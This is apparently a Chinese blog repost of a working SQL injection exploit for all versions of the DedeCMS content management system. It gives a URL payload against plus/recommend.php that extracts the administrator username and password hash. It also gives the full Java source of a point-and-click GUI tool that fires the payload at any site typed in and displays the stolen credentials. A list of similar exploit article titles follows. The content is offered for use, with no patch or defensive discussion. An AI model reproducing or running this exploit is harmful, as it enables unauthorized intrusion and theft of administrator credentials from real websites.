DedeCMS全版本通杀SQL注入漏洞利用代码
2014-03-21 14:32
671 查看
EXP:
利用工具源码(by 园长):
Exp:plus/recommend.php?action=&aid=1&_FILES[type][tmp_name]=\' or mid=@`\'` /*!50000union*//*!50000select*/1,2,3,(select CONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin` limit+0,1),5,6,7,8,9%23@`\'`+&_FILES[type][name]=1.jpg&_FILES[type] [type]=application/octet-stream&_FILES[type][size]=111
利用工具源码(by 园长):
package org.javaweb.dede.ui; import java.awt.Toolkit;import java.io.BufferedReader;import java.io.InputStreamReader;import java.net.URL;import java.util.regex.Matcher;import java.util.regex.Pattern; /** * * @author yz */public class MainFrame extends javax.swing.JFrame { private static final long serialVersionUID = 1L; /** * Creates new form MainFrame */ public MainFrame() { initComponents(); } public String request(String url){ String str = "",tmp; try { BufferedReader br = new BufferedReader(new InputStreamReader(new URL(url).openStream())); while((tmp=br.readLine())!=null){ str+=tmp+"\r\n"; } } catch (Exception e) { jTextArea1.setText(e.toString()); } return str; } private void initComponents() { jPanel1 = new javax.swing.JPanel(); jLabel1 = new javax.swing.JLabel(); jTextField1 = new javax.swing.JTextField(); jButton1 = new javax.swing.JButton(); jScrollPane1 = new javax.swing.JScrollPane(); jTextArea1 = new javax.swing.JTextArea(); setDefaultCloseOperation(javax.swing.WindowConstants.EXIT_ON_CLOSE); jLabel1.setText("URL:"); jTextField1.setText("http://localhost"); this.setTitle("DedeCms recommend.php注入利用工具-p2j.cn"); int screenWidth = Toolkit.getDefaultToolkit().getScreenSize().width; int screenHeight = Toolkit.getDefaultToolkit().getScreenSize().height; this.setBounds(screenWidth / 2 - 229, screenHeight / 2 - 158, 458, 316); jButton1.setText("获取"); jButton1.addActionListener(new java.awt.event.ActionListener() { public void actionPerformed(java.awt.event.ActionEvent evt) { jButton1ActionPerformed(evt); } }); jTextArea1.setColumns(20); jTextArea1.setRows(5); jScrollPane1.setViewportView(jTextArea1); javax.swing.GroupLayout jPanel1Layout = new javax.swing.GroupLayout(jPanel1); jPanel1.setLayout(jPanel1Layout); jPanel1Layout.setHorizontalGroup( jPanel1Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING) .addGroup(jPanel1Layout.createSequentialGroup() .addGroup(jPanel1Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.TRAILING, false) .addComponent(jScrollPane1, javax.swing.GroupLayout.Alignment.LEADING) .addGroup(javax.swing.GroupLayout.Alignment.LEADING, jPanel1Layout.createSequentialGroup() .addContainerGap() .addComponent(jLabel1) .addPreferredGap(javax.swing.LayoutStyle.ComponentPlacement.RELATED) .addComponent(jTextField1, javax.swing.GroupLayout.PREFERRED_SIZE, 331, javax.swing.GroupLayout.PREFERRED_SIZE) .addPreferredGap(javax.swing.LayoutStyle.ComponentPlacement.RELATED) .addComponent(jButton1, javax.swing.GroupLayout.PREFERRED_SIZE, 83, javax.swing.GroupLayout.PREFERRED_SIZE))) .addGap(0, 0, Short.MAX_VALUE)) ); jPanel1Layout.setVerticalGroup( jPanel1Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING) .addGroup(jPanel1Layout.createSequentialGroup() .addContainerGap() .addGroup(jPanel1Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.BASELINE) .addComponent(jLabel1) .addComponent(jTextField1, javax.swing.GroupLayout.PREFERRED_SIZE, javax.swing.GroupLayout.DEFAULT_SIZE, javax.swing.GroupLayout.PREFERRED_SIZE) .addComponent(jButton1)) .addPreferredGap(javax.swing.LayoutStyle.ComponentPlacement.RELATED) .addComponent(jScrollPane1, javax.swing.GroupLayout.DEFAULT_SIZE, 254, Short.MAX_VALUE)) ); javax.swing.GroupLayout layout = new javax.swing.GroupLayout(getContentPane()); getContentPane().setLayout(layout); layout.setHorizontalGroup( layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING) .addComponent(jPanel1, javax.swing.GroupLayout.DEFAULT_SIZE, javax.swing.GroupLayout.DEFAULT_SIZE, Short.MAX_VALUE) ); layout.setVerticalGroup( layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING) .addComponent(jPanel1, javax.swing.GroupLayout.DEFAULT_SIZE, javax.swing.GroupLayout.DEFAULT_SIZE, Short.MAX_VALUE) ); pack(); }// </editor-fold> private void jButton1ActionPerformed(java.awt.event.ActionEvent evt) { String url = jTextField1.getText(); if(null==url||"".equals(url)){ return ; } String result = request(url+"/plus/recommend.php?action=&aid=1&_FILES[type][tmp_name]=\\%27%20or%20mid=@`\\%27`%20/*!50000union*//*!50000select*/1,2,3,(select%20CONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin`%20limit+0,1),5,6,7,8,9%23@`\\%27`+&_FILES[type][name]=1.jpg&_FILES[type][type]=application/octet-stream&_FILES[type][size]=4294"); Matcher m = Pattern.compile("<h2>(.*)</h2>").matcher(result); if(m.find()){ String[] s = m.group(1).split("\\|"); if(s.length>2){ jTextArea1.setText("UserName:"+s[1]+"\r\nMD5:"+s[2].substring(3,s[2].length()-1)); } } } public static void main(String args[]) { java.awt.EventQueue.invokeLater(new Runnable() { public void run() { new MainFrame().setVisible(true); } }); } // Variables declaration - do not modify private javax.swing.JButton jButton1; private javax.swing.JLabel jLabel1; private javax.swing.JPanel jPanel1; private javax.swing.JScrollPane jScrollPane1; private javax.swing.JTextArea jTextArea1; private javax.swing.JTextField jTextField1; // End of variables declaration }
相关文章推荐
- DedeCMS全版本通杀SQL注入漏洞利用代码及工具
- DedeCMS全版本通杀SQL注入漏洞利用代码及工具
- DEDECMS 5.7之前版本远程SQL注入漏洞
- ecshop 全系列版本网站漏洞 远程代码执行sql注入漏洞
- ecshop 全系列版本网站漏洞 远程代码执行sql注入漏洞
- Dedecms getip()的漏洞利用代码
- [分析]-DedeCMS全版本通杀SQL注入漏洞
- [分析]-DedeCMS全版本通杀SQL注入漏洞
- 利用SQL注入漏洞登录后台
- dedecms最新版本存在远程包含漏洞--可getshell
- ewebeditor编辑器ASP/ASPX/PHP/JSP版本漏洞利用总结及解决方法
- 华众6.5虚拟主机管理系统SQL注入漏洞利用
- 游戏安全资讯精选 2018年第八期:3975款游戏被查处,游戏圈重击;Memcached被利用UDP反射攻击漏洞预警;VentureBeat称区块链或可定位和消除恶意可执行代码的安全问题
- 实战演示黑客如何利用SQL注入漏洞攻破一个WordPress网站
- 【漏洞公告】WordPress全版本WPDBSQL注入漏洞
- 伯乐asp收信程序漏洞及利用程序利用代码
- PHP代码网站如何防范SQL注入漏洞攻击建议分享
- 某家园论坛被植入利用ANI漏洞传播QQ盗号木马Trojan-PSW.Win32.QQPass.rj的代码
- [通杀]dedecms plus/search.php 注入漏洞利用EXP
- 某留学网站被植入利用 PPStream 堆栈漏洞的代码